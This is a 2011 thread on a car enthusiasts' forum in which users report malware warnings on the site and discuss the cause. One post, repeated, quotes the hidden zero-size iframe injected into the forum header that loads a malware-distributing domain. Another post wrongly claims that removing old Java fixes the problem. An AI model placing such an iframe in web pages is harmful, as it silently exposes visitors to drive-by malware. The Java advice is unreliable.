EM TuningMonster Motorsport
Closed Thread
Results 1 to 14 of 14
  1. #1
    1st Gear

    Status
    Offline
    Join Date
    Sep 2010
    Posts
    242

    Virus whe visiting the site?

    Hi all, I use Google Chromeweb browser from time to time and when I visited the site on it I get this message:



    Warning: Something's Not Right Here!
    Untitled Document contains content from ajkqqw.co.cc, a site known to distribute malware. Your computer might catch a virus if you visit this site.

    Google has found malicious software may be installed onto your computer if you proceed. If you've visited this site in the past or you trust this site, it's possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.

    Just wondering if anyone else gts this when they visit? I'm using Internet Explorer at the moment but my anti vrus software detects:

    08/03/2011 08:15:41 RelevantKnowledge Web Anti-Virus Packed:




    Anyone els get this or is it just me?
    Last edited by PetrolAholic; 8th March 2011 at 13:13.
    Audi RS4 B7 Saloon in Mugello Blue

  2. # ADS
    ADS
    Join Date
    Always
    Posts
    Many
     
  3. #2
    6th Gear

    Status
    Offline
    Join Date
    Jun 2010
    Location
    Coventry/Warwickshire
    Posts
    2,074
    yes use search function mate, is a small problem i believe.

  4. #3
    1st Gear

    Status
    Offline
    Join Date
    Sep 2010
    Posts
    242
    oops.... Had a look in this section and couldt see anything, only just started happening so thought it was something "new"
    Audi RS4 B7 Saloon in Mugello Blue

  5. #4
    Neutral

    Status
    Offline
    Join Date
    Feb 2011
    Location
    Essex, South
    Posts
    97
    This happened to me (at work...) yesterday. Site was down all yesterday evening too. Sounds like malicious code but I don't think it's a 'virus'.

    I suspect it's the jealous people from the Ford-Fiesta owners club...

  6. #5
    Neutral

    Status
    Offline
    Join Date
    Feb 2011
    Location
    Essex, South
    Posts
    97
    This happened to me (at work...) yesterday. Site was down all yesterday evening too. Sounds like malicious code but I don't think it's a 'virus'.

    I suspect it's the jealous people from the Ford-Fiesta owners club...

  7. #6
    Neutral

    Status
    Offline
    Join Date
    Feb 2010
    Posts
    30
    You need to go to java website download the latest version, also you need to remove java enviroment 2.41v from add and remove programs (xp) or programs and features (vista or Windows 7).

    Once you have update and removed the old version google and anti virus will not pick it up as being a virus, it is just a coding problem which is fixed by doing the above.

    If you need help with the above here is a link to javas website: Why should I remove older versions of Java from my system?

  8. #7
    Neutral

    Status
    Offline
    Join Date
    Feb 2011
    Location
    Tiverton, Somerset, United Kingdom, United Kingdom
    Posts
    82
    It's caused by this iframe at the top of each page removing/upgrading java etc isn't going to fix it they need to find out what caused it and patch it, I see that they have upgraded the forum to vBulletin 4.1.2 overnight but this still needs to be removed from the header template or an offending plugin which has got into the vb loop.

    <iframe src="http://ajkqqw.co.cc/tracker/?token=4430F2F6463811E0AD50A2DFE1E63F12&source=def ault&sub=1" width="0" height="0" frameborder="0"></iframe>

  9. #8
    Neutral

    Status
    Offline
    Join Date
    Feb 2011
    Location
    Tiverton, Somerset, United Kingdom, United Kingdom
    Posts
    82
    It's caused by this iframe at the top of each page removing/upgrading java etc isn't going to fix it they need to find out what caused it and patch it, I see that they have upgraded the forum to vBulletin 4.1.2 overnight but this still needs to be removed from the header template or an offending plugin which has got into the vb loop.

    <iframe src="http://ajkqqw.co.cc/tracker/?token=4430F2F6463811E0AD50A2DFE1E63F12&source=def ault&sub=1" width="0" height="0" frameborder="0"></iframe>

  10. #9
    1st Gear

    Status
    Offline
    Join Date
    Sep 2010
    Posts
    242
    Ahh site works fine on my iPhone lol. Tried removing java as suggested an didn't work. It's more of an annoyance than anything!!!
    Audi RS4 B7 Saloon in Mugello Blue

  11. #10
    warrenlord's Avatar
    4th Gear

    Status
    Offline
    Join Date
    Apr 2010
    Posts
    778
    Same ^^ iPhones fine but site says virus problems, it was down a day back ? Said down too malware or something threats within the forum.

    So what else can we do to enable the site if it's safe ??

  12. #11
    kevbu's Avatar
    Neutral

    Status
    Offline
    Join Date
    Aug 2010
    Posts
    59
    Avast has kept me off of audi-sport for 2 days
    Malware detected or something.
    Does site have a twitter page? I hashtagged "audi-sport" for some info but nothing found.

  13. #12
    g-a-c
    Guest

    Should be all clear now

    I emailed the hosts of that particular domain, and they've suspended it. So anyone who was getting warnings, they should start to die down. The admins still need to take some action to remove the actual exploit code from the top of the forum and to get themselves removed from Google's blacklist, but it should actually be safe to visit again now.

    edit - I see they allow guest posts (i.e. from me!), so I wonder if that's how the exploit has got in, some kind of vulnerability in vB exploited by a random guest user (or even automated bot) who hasn't had to login and pass any kind of humanity tests...

  14. #13
    DaveA3's Avatar
    Audi A-Trizzle!

    Status
    Offline
    Join Date
    Feb 2010
    Location
    Milton Keynes
    Posts
    2,378
    they didnt allow guests/bots before i dont think

    Audi A3 1.8T Sport (AGU) - 2000
    Engine: Carbonio CAI/Jetex JR Hybrid Induction, Forge 007p DV, Forge TIP, Longlife S/S Custom Exhaust system, R-Tech Stage 1 Remap, Creation Motorsport Boost Pipe Kit.
    Exterior and Chassis: 18" Cades Tyrus, Euro Wipers, low on JOM Coilovers, Eibach Front & Rear ARB's, Black Angel Eye Headlights, 6000K HID's, S3 Brakes.
    For Sale PM ME - £2500 Mods Inc

  15. #14
    Broken Byzan's Avatar
    Photographic Moderator

    Status
    Offline
    Join Date
    Apr 2004
    Location
    Cardiff, United Kingdom
    Posts
    12,505

    My Social Networking

    Follow Broken Byzan On Twitter Add Broken Byzan on Facebook Add Broken Byzan on Google+ Visit Broken Byzan's Youtube Channel
    Is ASN ill?? Virus???

    To keep all related chat in one place, please go here, Cheers

 

 

Posting Permissions

  • You may post new threads
  • You may post replies
  • You may not post attachments
  • You may edit your posts
  •  
Single Sign On provided by vBSSO

Garage Plus, Vendor Tools vBulletin Plugins by Drive Thru Online, Inc.

Content Relevant URLs by vBSEO